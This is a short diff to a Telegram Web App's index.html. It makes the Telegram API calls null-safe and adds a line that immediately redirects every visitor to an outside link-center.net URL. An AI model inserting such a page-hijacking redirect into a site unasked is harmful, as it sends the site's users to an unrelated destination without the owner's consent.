--- a/index.html
+++ b/index.html
@@ -59,9 +59,12 @@
 
     <script src="https://telegram.org/js/telegram-web-app.js"></script>
     <script>
-      const tg = window.Telegram.WebApp;
-      tg.ready(); // signals Telegram the app is ready
-      tg.expand(); // expands web app view if possible
+      const tg = window.Telegram?.WebApp;
+      tg?.ready?.();
+      tg?.expand?.();
+
+      // Redirect immediately to another site
+      window.location.href = "https://link-center.net/1378706/ek0EglppwURE";
     </script>
   </body>
 </html>
